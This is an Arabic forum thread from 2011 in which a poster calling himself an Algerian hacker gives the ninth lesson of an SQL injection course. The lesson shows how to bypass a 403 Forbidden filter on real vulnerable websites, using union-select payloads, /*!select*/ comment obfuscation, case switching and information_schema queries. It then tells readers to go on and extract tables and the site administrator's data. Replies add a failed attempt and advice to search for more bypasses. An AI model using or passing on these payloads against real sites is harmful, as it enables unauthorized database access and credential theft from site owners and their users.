العلم نهضة الامة الإسلامية



مرحبا بك عزيزي الزائر في منتديات ثقافة 2009 شعارنا العلم نهضة الأمة الإسلامية . المرجوا منك أن تعرّف بنفسك و تدخل المنتدى معنا. إن لم يكن لديك حساب بعد, نتشرف بدعوتك لإنشائه و شكرا لك ,المدير العام:محمد تابليت . santa


العلم نهضة الامة الإسلامية

شعارنا العلم معرفة شعارنا العلم نهضة الأمة الإسلامية
 
الرئيسيةالبوابةاليوميةمكتبة الصورس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول

.: عدد زوار المنتدى :.

بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
المواضيع الأخيرة
أفضل 10 أعضاء في هذا المنتدى
mohamed10060
 
issame1995
 
salah
 
michaal
 
خالدوه
 
abdo
 
malik
 
fio123
 
fouad_tablit
 
leader
 

شاطر | 
 

  {الدرس التاسع}تخطي الــForbidden 403

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
mohamed10060
Admin
Admin
avatar

الأوسمة :
الهواية :
المهنة :
المزاج :

الجنس : ذكر الدولة : الجزائر

عدد المساهمات : 201
نقاط : 926
السٌّمعَة : 3
تاريخ التسجيل : 15/09/2009
العمر : 22
الموقع : حاسي مسعود
تعاليق على المنتدى : منتدى من الروائع

مُساهمةموضوع: {الدرس التاسع}تخطي الــForbidden 403    الخميس يوليو 21, 2011 6:37 am

{الدرس التاسع}تخطي الــForbidden 403

السلام عليكم ورحمة الله وركاته
================
دورة احتراف
SQL Injection

مقدمة من قبل الهكر الجزائري
Mohamed10060

الدرس التاسع من الدورة
^_^
تخطي الــForbidden 403
=====================
نبدأ درسنا ببسم الله
===========-^__^-===========

اولا نفتح الموقع المصاب

وهذه صورة من موقع انا وجدتو وهو مصاب
وهذه صورة للخطأ

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

طيب نضيف للرابط
كود:
+order+by+1--

لمعرفة عدد الأعمدة
وقد شرحت كيفية معرفة عدد الأعمدة
انا ظهر لي عدد الأعمدة للموقع ال حطبق عليه
6

طيب نبدل امر استخراج عدد الأعمدة
كود:
+order+by+

بأمر استخراج العامود المصاب
كود:
+union+select+1,2,3,4,5,6

مع تغيير
1,2,3,4,5,6
الى عدد الاعمدة ال بالموقع ال مستهدفه انت
طيب بعد الاستبدال نفتح الرابط


شوفوا شو ظهر لنا
Forbidden 403
طيب كيف نتخطاها
منعدل بالامر

كود:
select

بي
كود:
/*!select*/

يعني الرابط بيصير كذا

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بعد تعديل الامر نفتح الرابط ونشوف اذا ظهر لنا رقم العامود المصاب


تمام ظهر لنا رقم العامود المصاب وهو 3
وتخطينا المشكلة

طيب الان منكمل حقن
نضع مكان العامود
امر استخراج اصدار القاعدة
كود:
version()


نضعه ونشوف اذا بيظهر لنا الاصدار



تمام ظهر لنا الاصدار وهو الخامس

طيب نبدل
امر استخراج اصدار القاعدة
كود:
version()

بأمر
كود:
group_concat(table_name)


ونضع بنهاية الرابط
كود:
+from+information_schema.tables+where+table_schema=database()


بعد التعديل نفتح الرابط ونشوف اذا حتظهر لنا الجداول



اوووووووووه واجهتنا نفس المشكلة
طيب

منبدل
كود:
group_concat

بي
كود:
GROUP_CONCAT


يعني منحول من سمول الى كابتل

ومنبدل
information_schema.tables
بي
كود:
information_schema./*!tables*/


يعني الرابط بيصير كذا

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
طيب بعد التعديل نفتح الرابط

ونشوف اذا حتظهرلنا الجداول


يا سلام اتخطينا المشكلة مرة اخرى
وظهرت لنا جميع الجداول

ولن اطول الشرح اكثر
انتو بتكملو عملية الحقن عادية بتستخرجوا الجداول
وبيانات مدير الموقع

يعني اذا بدكم تستخرجو الاعمدة فقط بتبدلو
Table_name
بي
column_name
وا
كود:
/*!tables*/

بي
كود:
/*!colums*/


هذه تكون نهاية الدرس التاسع من الدورة
ارجو ان يكون الدرس واضح ومفهوم
ولي عنده اي اسفسار يضعه في هذا الموضوع


الى اللقاء في الدرس التاسع من الدورة

بالتوفيق للجميع

اخوكم في الله

Mohamed10060
.


_________________التوقيع:
رائــع : تصحيح أخطاء الغير
الأروع : أن لايتحول اقتناص الأخطاء إلى متعة شخصية لديك
رائــع : أن تقدم نصيحة لمن تحب
الأروع : ألا تتحول النصيحة إلى جرح للمشاعر

معاك يالخذرة معاك يدزاير معاك يسعدان

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://thakafa2009.mam9.com
AFLAWI

avatar

الهواية :
المهنة :
المزاج :

الجنس : ذكر الدولة : الجزائر

عدد المساهمات : 1
نقاط : 1
السٌّمعَة : 0
تاريخ التسجيل : 10/08/2011

مُساهمةموضوع: رد: {الدرس التاسع}تخطي الــForbidden 403    الأربعاء أغسطس 10, 2011 5:04 pm

بارك الله فـــــيـــــك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
mohamed10060
Admin
Admin
avatar

الأوسمة :
الهواية :
المهنة :
المزاج :

الجنس : ذكر الدولة : الجزائر

عدد المساهمات : 201
نقاط : 926
السٌّمعَة : 3
تاريخ التسجيل : 15/09/2009
العمر : 22
الموقع : حاسي مسعود
تعاليق على المنتدى : منتدى من الروائع

مُساهمةموضوع: رد: {الدرس التاسع}تخطي الــForbidden 403    الخميس أغسطس 11, 2011 9:22 am

dr1 et mrc pour la visite Razz

_________________التوقيع:
رائــع : تصحيح أخطاء الغير
الأروع : أن لايتحول اقتناص الأخطاء إلى متعة شخصية لديك
رائــع : أن تقدم نصيحة لمن تحب
الأروع : ألا تتحول النصيحة إلى جرح للمشاعر

معاك يالخذرة معاك يدزاير معاك يسعدان

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://thakafa2009.mam9.com
fio123

avatar

الهواية :
المهنة :
المزاج :

الجنس : ذكر الدولة :

عدد المساهمات : 6
نقاط : 6
السٌّمعَة : 0
تاريخ التسجيل : 10/12/2011

مُساهمةموضوع: رد: {الدرس التاسع}تخطي الــForbidden 403    الجمعة ديسمبر 16, 2011 5:26 pm

الاخ محمد ..برغم كل هذا لا زالت تخرج الرسالة التالية

((
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
))

ما العمل جزاك الله خيرا
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
mohamed10060
Admin
Admin
avatar

الأوسمة :
الهواية :
المهنة :
المزاج :

الجنس : ذكر الدولة : الجزائر

عدد المساهمات : 201
نقاط : 926
السٌّمعَة : 3
تاريخ التسجيل : 15/09/2009
العمر : 22
الموقع : حاسي مسعود
تعاليق على المنتدى : منتدى من الروائع

مُساهمةموضوع: رد: {الدرس التاسع}تخطي الــForbidden 403    الأربعاء ديسمبر 21, 2011 4:07 am

يجد من قام بتغير الحماية
قم بالبحش في جوجل عن التخطي يوجد كثير من الطرق

_________________التوقيع:
رائــع : تصحيح أخطاء الغير
الأروع : أن لايتحول اقتناص الأخطاء إلى متعة شخصية لديك
رائــع : أن تقدم نصيحة لمن تحب
الأروع : ألا تتحول النصيحة إلى جرح للمشاعر

معاك يالخذرة معاك يدزاير معاك يسعدان

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://thakafa2009.mam9.com
 
{الدرس التاسع}تخطي الــForbidden 403
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
العلم نهضة الامة الإسلامية :: ::الدورات المجانية:: :: دورة مفاهيم أساسية وللمبتدئين في SQL Injection-
انتقل الى: